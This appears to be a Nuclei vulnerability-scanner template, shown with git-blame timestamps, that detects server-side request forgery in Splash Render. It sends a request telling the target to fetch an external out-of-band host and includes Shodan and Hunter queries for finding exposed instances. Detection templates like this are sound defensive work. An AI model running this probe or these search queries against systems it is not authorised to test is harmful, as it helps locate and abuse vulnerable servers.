2023-03-16 11:59:02 +00:00
|
|
|
id: splash-render-ssrf
|
|
|
|
|
|
|
|
info:
|
2023-03-27 06:26:00 +00:00
|
|
|
name: Splash Render - SSRF
|
2023-03-16 11:59:02 +00:00
|
|
|
author: pwnhxl
|
|
|
|
severity: high
|
2024-01-15 11:44:47 +00:00
|
|
|
description: Splash Render is vulnerable to Server-Side Request Forgery (SSRF) Vulnerability.
|
2023-03-16 11:59:02 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/scrapinghub/splash
|
2023-03-17 10:33:40 +00:00
|
|
|
- https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/
|
2023-03-16 11:59:02 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 1
|
2023-03-16 23:00:41 +00:00
|
|
|
shodan-query: title:"Splash"
|
2023-03-16 11:59:02 +00:00
|
|
|
hunter-query: web.title="Splash" && header="TwistedWeb"
|
2023-03-27 06:26:00 +00:00
|
|
|
tags: splash,ssrf,oast,oss
|
2023-03-16 11:59:02 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2023-03-16 23:00:41 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2023-03-27 06:26:00 +00:00
|
|
|
- "{{BaseURL}}/render.html?url=https://oast.live"
|
2023-03-16 11:59:02 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-03-21 05:38:50 +00:00
|
|
|
part: body
|
2023-03-16 11:59:02 +00:00
|
|
|
words:
|
2023-03-27 06:26:00 +00:00
|
|
|
- 'Interactsh Server'
|
2023-03-16 11:59:02 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-01-15 11:49:24 +00:00
|
|
|
# digest: 4a0a0047304502200582ef3ecc5d0fe82668fe963fd2ec2b015ddf730410422894d89b53ede4a05f022100d3c1e2907847b4e232292bd1d7fd5d1cd432bcfe7c032743680ed0d838509bb8:922c64590222798bb761d5b6d8e72950
|